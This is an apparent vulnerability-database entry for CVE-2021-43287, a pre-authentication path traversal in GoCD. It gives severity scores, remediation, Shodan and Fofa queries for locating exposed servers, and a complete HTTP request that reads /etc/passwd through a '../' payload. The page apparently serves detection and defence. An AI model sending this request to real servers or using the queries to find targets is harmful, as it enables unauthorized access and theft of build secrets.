🔙 목록으로 돌아가기

CVE-2021-43287: Pre-Auth Takeover of Build Pipelines in GoCD

TitlePre-Auth Takeover of Build Pipelines in GoCD
AuthordhiyaneshDk
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications.
RemediationUpgrade to version v21.3.0. or later.
CVSS Score7.5
EPSS Score0.91307
CVE IDCVE-2021-43287
CWE IDCWE-200
Shodan Queryhttp.title:"Create a pipeline - Go" html:"GoCD Version"http.html:"gocd version"http.title:"create a pipeline - go" html:"gocd version"
Fofa Querytitle="create a pipeline - go" html:"gocd version"body="gocd version"
Tags cve2021 cve go lfi gocd thoughtworks vkev vuln

🔍 Vulnerability Description

GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.

🌐 HTTP Request

GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43287.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-43287.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A